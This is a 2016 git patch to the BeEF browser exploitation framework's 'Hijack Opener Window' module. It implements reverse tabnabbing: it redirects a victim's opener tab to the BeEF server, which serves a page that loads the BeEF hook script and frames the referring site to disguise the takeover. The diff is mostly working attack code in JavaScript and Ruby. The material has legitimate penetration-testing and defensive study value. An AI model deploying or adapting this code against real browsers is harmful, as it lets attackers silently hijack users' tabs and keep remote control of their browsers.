From 2a952e99eea76c70bc31a0ed09ef1b536af369b0 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Tue, 4 Oct 2016 16:11:38 +0000
Subject: [PATCH] Update Hijack Opener Window module to use server-side iframe
 loader

---
 modules/persistence/hijack_opener/command.js  |  3 +--
 modules/persistence/hijack_opener/config.yaml |  4 ++--
 modules/persistence/hijack_opener/module.rb   | 20 +++++++++++++++++++
 3 files changed, 23 insertions(+), 4 deletions(-)

diff --git a/modules/persistence/hijack_opener/command.js b/modules/persistence/hijack_opener/command.js
index 2c7d8c49d..0b6c4c692 100644
--- a/modules/persistence/hijack_opener/command.js
+++ b/modules/persistence/hijack_opener/command.js
@@ -6,10 +6,9 @@
 
 beef.execute(function() {
   var referrer = document.referrer;
-  var hook = beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+beef.net.hook;
   try {
     beef.debug("[Hijack Opener] Trying to hijack: " + referrer);
-    window.opener.location = 'data:text/html,<html><head><title>'+referrer+'</title><script src="'+hook+'"></'+'script><style>body {padding:0;margin:0}</style></head><body><iframe src="'+referrer+'" style="width:100%;height:100%;margin:0;padding:0;border:0"></iframe></body>';
+    window.opener.location = beef.net.httpproto + '://' + beef.net.host+ ':' + beef.net.port + '/iframe#' + referrer;
     beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=hijacked window.opener.location", beef.are.status_success());
   } catch (e) {
     beef.debug("[Hijack Opener] could not hijack opener window: "+e.message)
diff --git a/modules/persistence/hijack_opener/config.yaml b/modules/persistence/hijack_opener/config.yaml
index 18000e9af..3c456aa67 100644
--- a/modules/persistence/hijack_opener/config.yaml
+++ b/modules/persistence/hijack_opener/config.yaml
@@ -12,5 +12,5 @@ beef:
             description: "This module abuses window.location.opener to hijack the opening window, replacing it with a BeEF hook and 100% * 100% iframe containing the referring web page. Note that the iframe will be blank if the origin makes use of a restrictive X-Frame-Origin directive.<br/><br/>This attack will only work if the opener did not make use of the <i>noopener</i> and <i>noreferrer</i> directives. Refer to <a href='https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/'>Target=_blank - the most underestimated vulnerability ever</a> for more information."
             authors: ["bcoles"]
             target:
-                user_notify: ["FF"]
-                not_working: ["All"]
+                user_notify: ["All"]
+                not_working: ["O"]
diff --git a/modules/persistence/hijack_opener/module.rb b/modules/persistence/hijack_opener/module.rb
index 4c5d00554..0b00d4c38 100644
--- a/modules/persistence/hijack_opener/module.rb
+++ b/modules/persistence/hijack_opener/module.rb
@@ -4,6 +4,26 @@
 # See the file 'doc/COPYING' for copying permission
 #
 class Hijack_opener < BeEF::Core::Command
+  def pre_send
+    config = BeEF::Core::Configuration.instance
+    hook_file = config.get('beef.http.hook_file')
+
+    src = '<html><head><title></title><style>body {padding:0;margin:0;border:0}</style></head>'
+    src << "<body><iframe id='iframe' style='width:100%;height:100%;margin:0;padding:0;border:0'></iframe>"
+    src << "<script src='#{hook_file}'></script>"
+    src << '<script>var url = window.location.hash.slice(1);'
+    src << 'if (url.match(/^https?:\/\//)) {'
+    src << 'document.title = url;'
+    src << 'document.getElementById("iframe").src = url;'
+    src << '}</script></body></html>'
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw(
+      '200',
+      {'Content-Type' => 'text/html'},
+      src,
+      '/iframe',
+      -1)
+  end
+
   def post_execute
     save({'result' => @datastore['result']})
   end